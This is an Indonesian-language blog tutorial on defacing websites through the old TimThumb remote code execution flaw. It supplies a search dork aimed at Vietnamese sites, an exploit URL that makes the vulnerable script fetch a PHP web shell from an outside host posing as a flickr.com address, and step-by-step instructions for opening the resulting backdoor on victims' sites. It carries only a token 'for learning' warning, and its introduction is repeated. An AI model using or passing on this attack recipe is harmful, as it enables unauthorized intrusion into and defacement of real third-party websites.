Cara Deface Website Menggunakan Exploit Timthumb RCE
Assalamualaikum Wr.Wb
Berjumpa lagi denagan saya Fahmi-O'Conner
Udah sangat lama kayaknya saya tidak buat tutorial baru, Maklum kemaren baru ngumpulin uang untuk beli Domain baru "hehehe"
Jadi pada kesempatan kali ini kita bakalan belajar tutorial deface baru nih, Sebenarnya ini adalah Exploit lama sobat, Tapi tidak ada salahnya kalau ini saya ajarkan kepada anda :V
Warning : This tutorial is only for learning, so use it wisely
Terimakasih tlah membaca artikel ini, Semoga besok adalah hari kebruntungan mu kawan ^_^
Berjumpa lagi denagan saya Fahmi-O'Conner
Udah sangat lama kayaknya saya tidak buat tutorial baru, Maklum kemaren baru ngumpulin uang untuk beli Domain baru "hehehe"
Jadi pada kesempatan kali ini kita bakalan belajar tutorial deface baru nih, Sebenarnya ini adalah Exploit lama sobat, Tapi tidak ada salahnya kalau ini saya ajarkan kepada anda :V
Dork : inurl:/timthumb.php site:vn
Exploit : ?src=http://flickr.com.tukangpompajakarta.com/shell.php
Deface Script : [DOWNLOAD]Lengkapi peralatan yang di butuhkan di atas, Jika sudah barulah kita bisa untuk melanjutkan tutorialnya :D
- Seperti biasa gan, Cari target kita dengan Dork yang saya sediakan di atas (Pakai live target sendiri juga boleh)
- Pilih salah satu target dan jangan lupa untuk menambahkan Exploit ini "timthum.php" di belakang Domain target, Contoh : http://target.vn/timthum.php (Ciri-ciri vuln versinya itu di bawah 1.32)
- Sekarang kita coba masukkan Exploit di atas seperti ini http://target.vn/timthum.php/?src=http://flickr.com.tukangpompajakarta.com/shell.php, Jika vuln akan terdapat sebuah link untuk mengakses Shell kamu.
- Sekarang tinggal kalian akses saja Shell Backdoornya dengan link yang sudah di berikan
Warning : This tutorial is only for learning, so use it wisely
Terimakasih tlah membaca artikel ini, Semoga besok adalah hari kebruntungan mu kawan ^_^